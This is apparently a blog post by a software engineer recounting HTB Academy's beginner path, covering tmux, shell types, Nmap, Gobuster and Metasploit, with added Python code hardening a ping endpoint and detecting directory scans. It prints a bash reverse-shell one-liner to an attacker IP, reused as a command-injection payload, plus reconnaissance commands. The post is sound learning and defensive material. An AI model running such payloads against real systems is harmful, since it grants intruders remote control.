A Software Engineer’s First Steps into Hacking with HTB Academy
Last weekend, I mentioned that I had previously played CTFs on picoCTF and hacked easy machines on HackTheBox. So I decided to play with HackTheBox machines this weekend as well, and that is how I found HTB Academy.
After registration, I was pleasantly surprised — cybersecurity skills were organized into learning paths that let anyone start learning cybersecurity from scratch. It was awesome!
On Saturday morning I started the basic free path called “Cracking into Hack the Box” and worked through it for a couple of hours.
Even in such a short time, I learned a lot from these hacking courses that I will use in my day job as a software engineer.
Tmux
Install and launch on Ubuntu:
sudo apt install tmux
tmux
It lets you split a single terminal into many windows and panes and switch between them.
Use case: connect to a remote machine with a single SSH session and switch between several shells inside it.
Previously, I always opened multiple SSH connections to a machine when I needed to do a couple of things simultaneously. From now on, I will do the same task more efficiently with tmux.
Shell on a remote machine
I never knew how hackers create shells on remote machines. I always thought that “creating a shell” meant SSH-ing into the machine, but SSH is not the only way to send commands to a machine.
Shells come in different types:
- Reverse shell — when a remote shell connects to a local machine, and the local machine can send commands to it.
- Bind shell — when a remote machine listens for new shell connections, and a local machine may connect and execute commands on it.
- Web shell — when a remote machine executes shell commands via HTTP requests.
To start the first two kinds of shell, a hacker needs nothing more than the default bash on a Linux target (plus a listener such as nc on their own machine). Let’s see how a reverse shell is created:
- The hacker executes nc -lvnp 1234 on the local machine.
- The hacker executes bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1' on the remote machine, where 10.10.10.10 and 1234 are the IP address and port of the local machine from step 1.
That’s it — the hacker has a shell on the remote machine.
Use case: vulnerable software that allows command execution, for example through HTTP requests.
Previously, I had only heard about this type of exploitation; now I will be more careful when developing my software to protect it against this class of vulnerability.
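The “command execution via HTTP” weakness above is usually a web handler that pastes request input into a shell string. As an added example (not from the course or this post), here is a hypothetical “ping this host” feature written both ways: the vulnerable string builder, and a hardened version that validates the input and never invokes a shell.

```python
import re
import subprocess
from ipaddress import ip_address

# Hypothetical feature: a web endpoint lets users ping a host. Both builders
# below are illustration only; neither comes from the HTB Academy material.

def vulnerable_ping_command(host: str) -> str:
    """Interpolates untrusted input into a shell string (do NOT use).

    Run with subprocess.run(cmd, shell=True), the shell honours ';', '|', '&&',
    so anything after the host is executed too, e.g. the bash reverse shell.
    """
    return f"ping -c 1 {host}"

# Plain DNS label characters only; no spaces, quotes, slashes or operators.
_HOSTNAME = re.compile(r"^[A-Za-z0-9.-]{1,253}$")

def is_allowed_host(host: str) -> bool:
    """Accept a literal IPv4/IPv6 address or a conservative hostname."""
    try:
        ip_address(host)
        return True
    except ValueError:
        pass
    # Reject a leading '-' so the value cannot be parsed as a ping option.
    return bool(_HOSTNAME.fullmatch(host)) and not host.startswith("-")

def safe_ping_command(host: str) -> list:
    """Validate, then return an argv list for subprocess.run(..., shell=False)."""
    if not is_allowed_host(host):
        raise ValueError(f"rejected host: {host!r}")
    return ["ping", "-c", "1", host]

def run_ping(host: str) -> int:
    """Execute the hardened command; no shell, so metacharacters are inert."""
    argv = safe_ping_command(host)
    return subprocess.run(argv, capture_output=True, timeout=10).returncode

if __name__ == "__main__":
    # Constructed attacker input: the reverse-shell one-liner from the post,
    # appended after a legitimate-looking address.
    payload = "10.10.10.10; bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1'"
    print("vulnerable builder would run:", vulnerable_ping_command(payload))
    print("hardened builder accepts it? ", is_allowed_host(payload))  # False
```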
Nmap
I was already familiar with Nmap, but these courses showed me that Nmap is a really powerful tool. For example, you can scan all ports and identify the versions of the services running on the machine:
nmap -sV -sC -p- 10.129.42.253
Use case: exploration before an attack on the machine.
I didn’t gain much new knowledge for my day job from the Nmap part, because I already know that ports should be closed with a firewall and only the ports where my services listen should accept traffic. The firewall should restrict traffic to known networks, and the services themselves should be kept up to date.
Gobuster
Gobuster is an enumeration tool that can help explore website directories. For example:
gobuster dir -u http://10.129.203.156/nibbleblog/ --wordlist /usr/share/dirb/wordlists/common.txt
This command tries every entry in the provided wordlist as a directory name under the “nibbleblog” directory and reports the ones that exist.
Use case: exploration before an attack on the machine.
The consequence for me here:
I should be careful about which endpoints my application exposes to external clients, because a simple misconfiguration is enough to expose management endpoints and turn the application into an easy target.
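A gobuster run like the one above leaves a very recognizable trace: one client producing a burst of 404s for paths nobody links to. As an added example (not from the course or this post), here is a small detector over constructed Apache/nginx-style access-log lines that flags clients exceeding a 404 threshold inside a sliding time window.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log ("combined" format). 10.10.14.5 imitates a wordlist
# scan of /nibbleblog/; 192.168.1.20 is an ordinary visitor with one 404.
SCAN_PATHS = ["admin", "backup", "config", "dashboard", "install", "login",
              "phpmyadmin", "private", "test", "tmp", "upload", "wp-admin"]
SAMPLE_LOG = [
    f'10.10.14.5 - - [15/Mar/2024:10:00:{i:02d} +0000] '
    f'"GET /nibbleblog/{p}/ HTTP/1.1" 404 153 "-" "Mozilla/5.0"'
    for i, p in enumerate(SCAN_PATHS)
] + [
    '192.168.1.20 - - [15/Mar/2024:10:00:03 +0000] "GET /nibbleblog/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.168.1.20 - - [15/Mar/2024:10:00:05 +0000] "GET /nibbleblog/favicon.ico HTTP/1.1" 404 153 "-" "Mozilla/5.0"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) ')

def parse_line(line):
    """Return (ip, timestamp, path, status) or None for unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["path"], int(m["status"])

def find_scanners(lines, threshold=10, window=timedelta(seconds=60)):
    """Map each client IP to its peak number of 404s within any `window`,
    keeping only clients whose peak reaches `threshold`."""
    misses = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec[3] == 404:
            misses[rec[0]].append(rec[1])
    flagged = {}
    for ip, times in misses.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):
            while t - times[start] > window:   # slide the window's left edge
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged

if __name__ == "__main__":
    print(find_scanners(SAMPLE_LOG))  # {'10.10.14.5': 12}
```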
Metasploit
Metasploit is a great framework that automates the exploitation of known vulnerabilities in software. I don’t have much to say about it, except this: keep your software up to date, because there are plenty of ready-to-use exploits that let even a script kiddie hack a vulnerable system by simply typing a few commands in Metasploit.
Example of Metasploit usage:
- Start Metasploit: msfconsole
- Search for an exploit: search exploit <service_name>
- Use an exploit: use <exploit_name>
- Show options for the exploit: show options
- Set options for the exploit: set <option_name> <option_value>
- Exploit: exploit
That’s how a vulnerable target can be exploited with Metasploit. It’s pretty easy, and anyone can do it. I learned one important thing here:
All services and libraries should be kept up to date; otherwise they will be hacked.
ParrotOS
ParrotOS is a Debian-based Linux distribution with hacking tools preinstalled. HTB also has its own distribution, which is very helpful while learning. Additionally, I want to mention that an OS for hacking should be installed in VirtualBox to protect my own machine.
I don’t have too much to say about this, just:
If I’m learning to hack, I will do it in VirtualBox.
Next Steps
I’m planning to continue exploring HTB Academy in the evenings, after work and after spending time with my family: at least one hour per day as a hobby where I can relax and learn something useful.
I also notice how differently the brain works when hacking compared to programming:
- In programming, you think about how to make a system work. Usually one way to make the system work is enough, and the developer can switch to the next task.
- In hacking, you think about how to break a system. It’s very hard to find a way in at first glance; you need to analyze different approaches, collect a lot of information, and only then decide how to break the system. It’s different work compared to programming, because here one way is rarely enough.
These are very different ways of thinking, and I believe it will make me better at my day job, because a broad view is always better than a view from one side.
I highly recommend academy.hackthebox.com to every software engineer who is interested in cybersecurity, or who has at least watched movies like “Mr. Robot” or “Who Am I?”.
Stay tuned for more insights and tips on my journey through software engineering and cybersecurity — subscribe to keep learning with me.